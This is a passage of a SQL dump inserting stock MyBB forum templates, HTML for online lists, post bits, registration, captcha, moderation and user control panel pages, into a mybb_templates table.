'-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('389', 'online_row', '<tr>\n<td class=\"trow1\">{$online_name}{$user_ip}</td>\n<td align=\"center\" class=\"trow2\">{$online_time}</td>\n<td class=\"trow1\" width=\"50%\">{$location}</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('390', 'online_row_ip', '<br /><span class=\"smalltext\">{$lang->ip} {$user[\'ip\']} <a href=\"modcp.php?action=ipsearch&amp;ipaddress={$user[\'ip\']}&amp;search_users=1\">{$lang->lookup}</a></span>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('391', 'postbit_offline', '<img src=\"{$theme[\'imgdir\']}/buddy_offline.gif\" title=\"{$lang->postbit_status_offline}\" alt=\"{$lang->postbit_status_offline}\" />', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('392', 'postbit_editedby', '<span class=\"smalltext\">({$post[\'editnote\']} {$post[\'editedprofilelink\']}.)</span>\n\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('393', 'member_register_requiredfields', '<br />\n<fieldset class=\"trow2\">\n<legend><strong>{$lang->additional_info}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n{$requiredfields}\n</table>\n</fieldset>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('394', 'member_register_customfield', '<tr>\n<td>\n{$profilefield[\'name\']}\n<br />\n<span class=\"smalltext\">{$profilefield[\'description\']}</span>\n</td>\n</tr>\n<tr>\n<td>{$code}</td>\n</tr>', '-2', '1605', '', '1339729416'); INSERT INTO mybb_templates VALUES('395', 'error', '<html>\n<head>\n<title>{$title}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><span class=\"smalltext\"><strong>{$title}</strong></span></td>\n</tr>\n<tr>\n<td class=\"trow1\">{$error}</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('396', 'index_whosonline_memberbit', '{$comma}{$user[\'profilelink\']}{$invisiblemark}', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('397', 'member_profile_away', '<tr>\n<td class=\"trow1\" align=\"center\">\n<strong>{$lang->away_note}</strong><br />\n<span class=\"smalltext\"><em>{$lang->away_reason} {$awayreason}</em></span><br />\n{$lang->away_since} {$awaydate} &nbsp;&nbsp;&nbsp; {$lang->away_returns} {$returndate}\n</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('398', 'forumdisplay_moderatedby', '<span class=\"smalltext\">{$lang->moderated_by} <strong>{$moderators}</strong></span><br />', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('399', 'forumbit_depth2_cat', '<tr>\n<td class=\"{$bgcolor}\" align=\"center\" valign=\"top\" width=\"1\"><img src=\"{$theme[\'imgdir\']}/{$lightbulb[\'folder\']}.gif\" alt=\"{$lightbulb[\'altonoff\']}\" title=\"{$lightbulb[\'altonoff\']}\" class=\"ajax_mark_read\" id=\"mark_read_{$forum[\'fid\']}\" /></td>\n<td class=\"{$bgcolor}\" valign=\"top\">\n<strong><a href=\"{$forum_url}\">{$forum[\'name\']}</a></strong>{$forum_viewers_text}<div class=\"smalltext\">{$forum[\'description\']}{$subforums}</div>\n</td>\n<td class=\"{$bgcolor}\" valign=\"top\" align=\"center\" style=\"white-space: nowrap\">{$threads}{$unapproved[\'unapproved_threads\']}</td>\n<td class=\"{$bgcolor}\" valign=\"top\" align=\"center\" style=\"white-space: nowrap\">{$posts}{$unapproved[\'unapproved_posts\']}</td>\n<td class=\"{$bgcolor}\" valign=\"top\" align=\"right\" style=\"white-space: nowrap\">{$lastpost}</td>\n</tr>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('400', 'forumbit_depth1_cat_subforum', '<tr>\n<td class=\"tcat\" colspan=\"6\"><strong>&raquo;&nbsp;&nbsp;<a href=\"{$forum_url}\">{$forum[\'name\']}</a></strong><br /><span class=\"smalltext\">{$forum[\'description\']}</span></td></tr>{$sub_forums}', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('401', 'misc_help', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->help_docs}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n{$sections}\n{$footer}\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('402', 'posticons', '<tr>\n<td class=\"trow1\" style=\"vertical-align: top\"><strong>{$lang->post_icon}</strong><br /><span class=\"smalltext\"><label><input type=\"radio\" class=\"radio\" name=\"icon\" value=\"-1\"{$no_icons_checked} />{$lang->no_post_icon}</label></span></td>\n<td class=\"trow1\" valign=\"top\">{$iconlist}</td>\n</tr>\n', '-2', '1410', '', '1339729416'); INSERT INTO mybb_templates VALUES('403', 'previewpost', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\" style=\"clear: both; border-bottom-width: 0;\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->post_preview}</strong></td>\n</tr>\n</table>\n{$postbit}\n<br />\n', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('404', 'misc_help_helpdoc', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->help_docs}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$helpdoc[\'name\']}</strong></td>\n</tr>\n<tr>\n<td width=\"100%\" class=\"trow1\">{$helpdoc[\'document\']}</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('405', 'usercp_options_pppselect', '<tr>\n<td colspan=\"2\"><span class=\"smalltext\">{$lang->ppp}</span></td>\n</tr>\n<tr>\n<td colspan=\"2\">\n<select name=\"ppp\">\n<option value=\"\">{$lang->use_default}</option>\n{$pppoptions}\n</select>\n</td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('406', 'usercp_forumsubscriptions', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->forum_subscriptions}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<table width=\"100%\" border=\"0\" align=\"center\">\n<tr>\n{$usercpnav}\n<td valign=\"top\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"5\"><strong>{$lang->forum_subscriptions}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" valign=\"bottom\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->forum}</strong></span></td>\n<td class=\"tcat\" valign=\"bottom\" style=\"white-space: nowrap; text-align: center;\" width=\"85\"><span class=\"smalltext\"><strong>{$lang->posts}</strong></span></td>\n<td class=\"tcat\" valign=\"bottom\" style=\"white-space: nowrap; text-align: center;\" width=\"85\"><span class=\"smalltext\"><strong>{$lang->threads}</strong></span></td>\n<td class=\"tcat\" valign=\"bottom\" align=\"center\" width=\"200px\"><span class=\"smalltext\"><strong>{$lang->lastpost}</strong></span></td>\n</tr>\n{$forums}\n</table>\n</td>\n</tr>\n</table>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('407', 'member_register_stylebit', '<option value=\"{$style[\'sid\']}\">{$style[\'name\']}</option>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('408', 'usercp_options_stylebit', '<option value=\"{$style[\'sid\']}\" {$selected}>{$style[\'name\']}</option>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('409', 'forumdisplay_password_wrongpass', '<tr>\n<td class=\"trow1\" align=\"center\" colspan=\"2\"><strong>{$lang->wrong_forum_password}</strong></td>\n</tr>\n', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('410', 'private_empty_folder', '<tr>\n<td class=\"trow1\"><strong>{$foldername}</strong></td>\n<td class=\"trow1\" align=\"center\">{$foldercount}</td>\n<td class=\"trow1\" align=\"center\"><input type=\"checkbox\" class=\"checkbox\" name=\"empty[{$fid}]\" value=\"1\" /></td>\n</tr>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('411', 'misc_imcenter_msn', '<html>\n<head>\n<title>{$lang->msn_messenger_center}</title>\n{$headerinclude}\n</head>\n<body style=\"margin:0;left:0;top:0\" class=\"trow2\">\n<table width=\"100%\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" border=\"0\" align=\"center\" class=\"tborder\">\n<tr>\n<td class=\"thead\" align=\"center\"><strong>{$user[\'username\']} - {$lang->msn_messenger_center}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$navigationbar}</strong></span></td>\n</tr>\n<tr>\n<td class=\"trow1\" align=\"center\">{$lang->msn_address_is}<br />{$user[\'msn\']}</td>\n</tr>\n</table>\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('412', 'misc_imcenter_yahoo', '<html>\n<head>\n<title>{$lang->yahoo_center}</title>\n{$headerinclude}\n</head>\n<body style=\"margin:0;left:0;top:0\" class=\"trow2\">\n<table width=\"100%\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" border=\"0\" align=\"center\" class=\"tborder\">\n<tr>\n<td class=\"thead\" align=\"center\"><strong>{$user[\'username\']} - {$lang->yahoo_center}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" align=\"center\"><span class=\"smalltext\"><strong>{$navigationbar}</strong></span></td>\n</tr>\n<tr>\n<td class=\"trow1\" align=\"center\" colspan=\"2\"><strong>{$user[\'yahoo\']}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" align=\"center\" colspan=\"2\"><strong><img src=\"http://opi.yahoo.com/online?u={$user[\'yahoo\']}&amp;m=g&amp;t=2\" /></strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" align=\"center\" colspan=\"2\"><span class=\"smalltext\"><a href=\"http://edit.yahoo.com/config/send_webmesg?.target={$user[\'yahoo\']}&amp;.src=pg\">{$lang->send_y_message}</a></span></td>\n</tr><tr>\n<td class=\"trow1\" align=\"center\" colspan=\"2\"><span class=\"smalltext\"><a href=\"http://members.yahoo.com/interests?.oc=t&amp;.kw={$user[\'yahoo\']}&amp;.sb=1\">{$lang->view_y_profile}</a></td>\n</tr>\n</table>\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('413', 'usercp_editsig_current', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$lang->current_sig}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">{$sigpreview}</td>\n</tr>\n</table>\n<br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('414', 'usercp_editsig_preview', '<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\"><strong>{$lang->sig_preview}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\">{$sigpreview}</td>\n</tr>\n</table>\n<br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('415', 'member_resendactivation', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->resend_activation}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"member.php\" method=\"post\">\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->resend_activation}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" width=\"40%\"><strong>{$lang->email_address}</strong></td>\n<td class=\"trow1\" width=\"60%\"><input type=\"text\" class=\"textbox\" name=\"email\" /></td>\n</tr>\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->request_activation}\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_resendactivation\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('416', 'nav', '\n<div class=\"navigation\">\n{$nav}{$activesep}{$activebit}\n</div>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('417', 'nav_bit', '<a href=\"{$navbit[\'url\']}\">{$navbit[\'name\']}</a>{$sep}', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('418', 'nav_bit_active', '<span class=\"active\">{$navbit[\'name\']}</span>', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('419', 'moderation_inline_deletethreads', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->delete_threads}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"moderation.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->delete_threads}</strong></td>\n</tr>\n<tr>\n<td class=\"trow1\" colspan=\"2\" align=\"center\">{$lang->confirm_delete_threads}</td>\n</tr>\n{$loginbox}\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->delete_threads}\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_multideletethreads\" />\n<input type=\"hidden\" name=\"fid\" value=\"{$fid}\" />\n<input type=\"hidden\" name=\"threads\" value=\"{$inlineids}\" />\n<input type=\"hidden\" name=\"url\" value=\"{$return_url}\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('420', 'postbit_inlinecheck', '| <input type=\"checkbox\" class=\"checkbox\" name=\"inlinemod_{$post[\'pid\']}\" id=\"inlinemod_{$post[\'pid\']}\" value=\"1\" style=\"vertical-align: middle;\" {$inlinecheck} />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('421', 'moderation_inline_movethreads', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->move_threads}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"moderation.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->move_threads}</strong></td>\n</tr>\n{$loginbox}\n<tr>\n<td class=\"trow1\"><strong>{$lang->new_forum}</strong></td>\n<td class=\"trow2\">{$forumselect}</td>\n</tr>\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->move_threads}\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_multimovethreads\" />\n<input type=\"hidden\" name=\"fid\" value=\"{$fid}\" />\n<input type=\"hidden\" name=\"threads\" value=\"{$inlineids}\" />\n<input type=\"hidden\" name=\"url\" value=\"{$return_url}\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('422', 'moderation_inline_mergeposts', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->merge_posts}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"moderation.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->merge_posts}</strong></td>\n</tr>\n<tr>\n{$loginbox}\n<tr>\n<td class=\"trow2\"><strong>{$lang->post_separator}</strong></td>\n<td class=\"trow2\"><label><input type=\"radio\" class=\"radio\" name=\"sep\" value=\"hr\" checked=\"checked\" />&nbsp;{$lang->horizontal_rule}</label><br /><label><input type=\"radio\" class=\"radio\" name=\"sep\" value=\"new_line\" />&nbsp;{$lang->new_line}</label></td>\n</tr>\n{$postlist}\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->merge_posts}\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_multimergeposts\" />\n<input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n<input type=\"hidden\" name=\"url\" value=\"{$return_url}\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('423', 'moderation_inline_splitposts', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->split_thread}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n<form action=\"moderation.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->split_thread}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\"><span class=\"smalltext\"><strong>{$lang->new_thread_info}</strong></span></td>\n</tr>\n{$loginbox}\n<tr>\n<td class=\"trow2\"><strong>{$lang->new_subject}</strong></td>\n<td class=\"trow2\"><input type=\"text\" class=\"textbox\" name=\"newsubject\" value=\"{$lang->split_thread_subject} {$thread[\'subject\']}\" size=\"50\" /></td>\n</tr>\n<tr>\n<td class=\"trow1\"><strong>{$lang->new_forum}</strong></td>\n<td class=\"trow1\">{$forumselect}</td>\n</tr>\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" name=\"submit\" value=\"{$lang->split_thread}\" /></div>\n<input type=\"hidden\" name=\"action\" value=\"do_multisplitposts\" />\n<input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n<input type=\"hidden\" name=\"posts\" value=\"{$inlineids}\" />\n<input type=\"hidden\" name=\"url\" value=\"{$return_url}\" />\n</form>\n{$footer}\n</body>\n</html>', '-2', '1607', '', '1339729416'); INSERT INTO mybb_templates VALUES('424', 'moderation_delayedmoderation_move', '<br />\n{$lang->method}:<br />\n<label><input type=\"radio\" class=\"radio\" name=\"delayedmoderation[method]\" value=\"move\" {$method_selected[\'move\']} />{$lang->method_move}</label><br />\n<label><input type=\"radio\" class=\"radio\" name=\"delayedmoderation[method]\" value=\"redirect\" {$method_selected[\'redirect\']} />{$lang->method_move_redirect}</label> <input type=\"text\" class=\"textbox\" name=\"delayedmoderation[redirect_expire]\" value=\"{$mybb->input[\'redirect_expire\']}\" size=\"3\" /> {$lang->redirect_expire_note}<br />\n<label><input type=\"radio\" class=\"radio\" name=\"delayedmoderation[method]\" value=\"copy\" {$method_selected[\'copy\']} />{$lang->method_copy}</label><br />', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('425', 'moderation_delayedmoderation_merge', '<dt><input type=\"radio\" name=\"type\" value=\"merge\" {$type_selected[\'merge\']} id=\"type_merge\" onclick=\"toggleType();\" /> <label for=\"type_merge\"><strong>{$lang->merge_threads}</strong></label></dt>\n<dd style=\"margin-top: 4px; width: 100%;\" id=\"type_merge_expanded\">\n {$lang->new_subject}<br />\n <input type=\"text\" class=\"textbox\" name=\"delayedmoderation[subject]\" value=\"{$mybb->input[\'delayedmoderation\'][\'subject\']}\" size=\"40\" /><br />\n {$lang->thread_to_merge_with}<br />\n <input type=\"text\" class=\"textbox\" name=\"delayedmoderation[threadurl]\" value=\"{$mybb->input[\'delayedmoderation\'][\'threadurl\']}\" size=\"40\" />\n <br /><span class=\"smalltext\">{$lang->merge_with_note}</span>\n</dd>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('426', 'moderation_delayedmodaction_notes', '<tr>\n<td class=\"{$trow}\" align=\"center\">{$delayedmod[\'profilelink\']}</td>\n<td class=\"{$trow}\" align=\"center\">{$delayedmod[\'dateline\']}</td>\n<td class=\"{$trow}\" align=\"center\">{$delayedmod[\'action\']}</td>\n<td class=\"{$trow}\">{$info}</td>\n<td class=\"{$trow}\" align=\"center\"><a href=\"moderation.php?action=cancel_delayedmoderation&amp;tid={$tid}&amp;fid={$fid}&amp;did={$delayedmod[\'did\']}&amp;my_post_key={$mybb->post_code}\">{$lang->cancel}</a></td>\n</tr>\n', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('427', 'moderation_delayedmoderation', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->delayed_moderation}</title>\n{$headerinclude}\n</head>\n<body>\n{$header}\n{$display_errors}\n<br />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"5\"><strong>{$lang->delayed_mod_queue}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" align=\"center\"><strong>{$lang->mod_username}</strong></td>\n<td class=\"tcat\" align=\"center\"><strong>{$lang->days_to_perform_action}</strong></td>\n<td class=\"tcat\" align=\"center\"><strong>{$lang->mod_actions}</strong></td>\n<td class=\"tcat\" align=\"center\"><strong>{$lang->mod_information}</strong></td>\n<td class=\"tcat\" align=\"center\"><strong>{$lang->actions}</strong></td>\n</tr>\n{$delayedmods}\n</table>\n<br />\n<form action=\"moderation.php\" method=\"post\">\n<input type=\"hidden\" name=\"my_post_key\" value=\"{$mybb->post_code}\" />\n<input type=\"hidden\" name=\"action\" value=\"do_delayedmoderation\" />\n<input type=\"hidden\" name=\"url\" value=\"{$url}\" />\n<input type=\"hidden\" name=\"tid\" value=\"{$tid}\" />\n<input type=\"hidden\" name=\"fid\" value=\"{$fid}\" />\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" cellpadding=\"{$theme[\'tablespace\']}\" class=\"tborder\">\n<tr>\n<td class=\"thead\" colspan=\"2\"><strong>{$lang->delayed_moderation}</strong></td>\n</tr>\n<tr>\n<td class=\"tcat\" colspan=\"2\"><strong>{$lang->delayed_moderation_desc}</strong></td>\n</tr>\n{$loginbox}\n<tr>\n<td class=\"trow1\"><strong>{$lang->threads}</strong></td>\n<td class=\"trow2\">{$threads}</td>\n</tr>\n<tr>\n<td class=\"trow1\"><strong>{$lang->delay_moderation_for}</strong></td>\n<td class=\"trow2\"><input type=\"text\" class=\"textbox\" size=\"5\" name=\"delay\" maxlength=\"10\" value=\"{$mybb->input[\'delay\']}\"/> {$lang->days}</td>\n</tr>\n<tr>\n<td class=\"trow1\" style=\"vertical-align: top;\"><strong>{$lang->moderation_action}</strong></td>\n<td class=\"trow2\">\n<script type=\"text/javascript\">\n<!--\n function toggleType()\n {\n if($(\'type_merge\'))\n {\n if($(\'type_movecopythread\').checked == true)\n {\n Element.hide(\'type_merge_expanded\');\n Element.show(\'type_movecopythread_expanded\');\n }\n else if($(\'type_merge\').checked == true)\n {\n Element.hide(\'type_movecopythread_expanded\');\n Element.show(\'type_merge_expanded\');\n }\n else\n {\n Element.hide(\'type_movecopythread_expanded\');\n Element.hide(\'type_merge_expanded\');\n }\n }\n else\n {\n if($(\'type_movecopythread\').checked == true)\n {\n Element.show(\'type_movecopythread_expanded\');\n }\n else\n {\n Element.hide(\'type_movecopythread_expanded\');\n }\n }\n }\n// -->\n</script>\n<dl style=\"margin-top: 0; margin-bottom: 0; width: 100%;\">\n <dt><input type=\"radio\" name=\"type\" value=\"openclosethread\" {$type_selected[\'openclosethread\']} id=\"type_openclosethread\" onclick=\"toggleType();\" /> <label for=\"type_openclosethread\"><strong>{$lang->open_close_thread}</strong></label></dt>\n <dt><input type=\"radio\" name=\"type\" value=\"deletethread\" {$type_selected[\'deletethread\']} id=\"type_deletethread\" onclick=\"toggleType();\" /> <label for=\"type_deletethread\"><strong>{$lang->delete_thread}</strong></label></dt>\n <dt><input type=\"radio\" name=\"type\" value=\"move\" {$type_selected[\'movecopythread\']} id=\"type_movecopythread\" onclick=\"toggleType();\" /> <label for=\"type_movecopythread\"><strong>{$lang->move_copy_thread}</strong></label></dt>\n <dd style=\"margin-top: 4px;\" id=\"type_movecopythread_expanded\">\n {$lang->new_forum}<br />\n {$forumselect}\n {$moderation_delayedmoderation_move}\n </dd>\n <dt><input type=\"radio\" name=\"type\" value=\"stick\" {$type_selected[\'stick_unstick_thread\']} id=\"type_stick_unstick_thread\" onclick=\"toggleType();\" /> <label for=\"type_stick_unstick_thread\"><strong>{$lang->stick_unstick_thread}</strong></label></dt>\n {$moderation_delayedmoderation_merge}\n <dt><input type=\"radio\" name=\"type\" value=\"removeredirects\" {$type_selected[\'removeredirects\']} id=\"type_removeredirects\" onclick=\"toggleType();\" /> <label for=\"type_removeredirects\"><strong>{$lang->remove_redirects}</strong></label></dt>\n <dt><input type=\"radio\" name=\"type\" value=\"removesubscriptions\" {$type_selected[\'removesubscriptions\']} id=\"type_removesubscriptions\" onclick=\"toggleType();\" /> <label for=\"type_removesubscriptions\"><strong>{$lang->remove_subscriptions}</strong></label></dt>\n <dt><input type=\"radio\" name=\"type\" value=\"approveunapprovethread\" {$type_selected[\'approveunapprovethread\']} id=\"type_approveunapprovethread\" onclick=\"toggleType();\" /> <label for=\"type_approveunapprovethread\"><strong>{$lang->approve_unapprove_thread}</strong></label></dt>\n {$customthreadtools}\n</dl>\n<script type=\"text/javascript\">\n<!--\n toggleType();\n// -->\n</script>\n</td>\n</tr>\n</table>\n<br />\n<div align=\"center\"><input type=\"submit\" class=\"button\" value=\"{$lang->save_delayed_moderation}\" /></div>\n</form>\n{$footer}\n</body>\n</html>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('428', 'moderation_delayedmoderation_custommodtool', '<dt><input type=\"radio\" name=\"type\" value=\"modtool_{$tool[\'tid\']}\" {$checked} id=\"type_modtool_{$tool[\'tid\']}\" onclick=\"toggleType();\" /> <label for=\"type_modtool_{$tool[\'tid\']}\"><strong>{$tool[\'name\']}</strong> <small>({$lang->custom})</small></label></dt>', '-2', '1600', '', '1339729416'); INSERT INTO mybb_templates VALUES('429', 'member_register_regimage', '<br />\n<fieldset class=\"trow2\">\n<script type=\"text/javascript\" src=\"jscripts/captcha.js?ver=1400\"></script>\n<legend><strong>{$lang->image_verification}</strong></legend>\n<table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n<tr>\n<td><span class=\"smalltext\">{$lang->verification_note}</span></td>\n<td rowspan=\"2\" align=\"center\"><img src=\"captcha.php?action=regimage&amp;imagehash={$imagehash}\" alt=\"{$lang->image_verification}\" title=\"{$lang->image_verification}\" id=\"captcha_img\" /><br /><span style=\"color: red;\" class=\"smalltext\">{$lang->verification_subnote}</span>\n<script type=\"text/javascript\">\n<!--\n if(use_xmlhttprequest == \"1\")\n {\n document.write(\'<br \\/><br \\/><input type=\"button\" class=\"button\" tabindex=\"10000\" name=\"refresh\" value=\"{$lang->refresh}\" onclick=\"return captcha.refresh();\" \\/>\');\n }\n// -->\n</script>\n</td>\n</tr>\n<tr>\n<td><input type=\"text\" class=\"textbox\" name=\"imagestring\" value=\"\" id=\"imagestring\" style=\"width: 100%;\" /><input type=\"hidden\" name=\"imagehash\" value=\"{$imagehash}\" id=\"imagehash\" /></td>\n</tr>\n<tr>\n <td id=\"imagestring_status\" style=\"display: none;\" colspan=\"2\">&nbsp;</td>\n</tr>\n</table>\n</fieldset>', '-2', '1400', '', '1339729416'); INSERT INTO mybb_templates VALUES('430', 'member_register_regimage_recaptcha', '<br />\n<script type=\"text/javascript\">\n<!--\n var RecaptchaOptions = {\n theme: \'clean\'\n };\n// -->\n</script>\n<fieldset class=\"trow2\">\n <legend><strong>{$lang->image_verification}</strong></legend>\n <table cellspacing=\"0\" cellpadding=\"{$theme[\'tablespace\']}\">\n <tr>\n <td><span class=\"smalltext\">{$lang->verification_note}</span></td>\n </tr>\n <tr>\n <td><script type=\"text/javascript\" src=\"{$server}/challenge?k={$public_key}\"></script></td>\n </tr>\n</table>\n</fieldset>', '-2', '1605', '', '1339729416'); INSERT INTO mybb_templates VALUES('431', 'error_inline', '<div class=\"error\">\n <p><em>{$title}</em></p>\n <ul>\n {$errorlist}\n </ul>\n</div>\n<br />', '-2', '120', '', '1339729416'); INSERT INTO mybb_templates VALUES('432', 'member_register', '<html>\n<head>\n<title>{$mybb->settings[\'bbname\']} - {$lang->registration}</title>\n{$headerinclude}\n<script type=\"text/javascript\" src=\"jscripts/validator.js\"></script>\n</head>\n<body>\n{$header}\n<br />\n<form action=\"member.php\" method=\"post\" id=\"registration_form\"><input type=\"text\" style=\"visibility: hidden;\" value=\"\" name=\"regcheck1\" /><input type=\"text\" style=\"visibility: hidden;\" value=\"true\" name=\"regcheck2\" />\n{$regerrors}\n<table border=\"0\" cellspacing=\"{$theme[\'borderwidth\']}\" 